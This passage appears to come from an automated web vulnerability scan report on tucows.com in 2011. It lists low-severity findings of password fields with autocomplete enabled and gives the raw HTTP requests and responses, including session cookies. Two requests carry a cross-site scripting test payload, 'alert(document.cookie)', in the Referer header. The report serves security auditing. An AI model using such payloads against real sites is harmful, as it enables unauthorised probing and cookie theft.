                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.86. http://www.tucows.com/images/newassets/terms.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.87. http://www.tucows.com/images/newassets/warningcow200.png  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.88. http://www.tucows.com/images/newassets/warningcow200.png  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.89. http://www.tucows.com/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.90. http://www.tucows.com/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.91. http://www.tucows.com/preview/194850/x22  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.92. http://www.tucows.com/preview/194850/x22  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.93. http://www.tucows.com/privacy.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.94. http://www.tucows.com/privacy.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.95. http://www.tucows.com/sitemap.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.96. http://www.tucows.com/sitemap.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.97. http://www.tucows.com/software.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.98. http://www.tucows.com/software.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

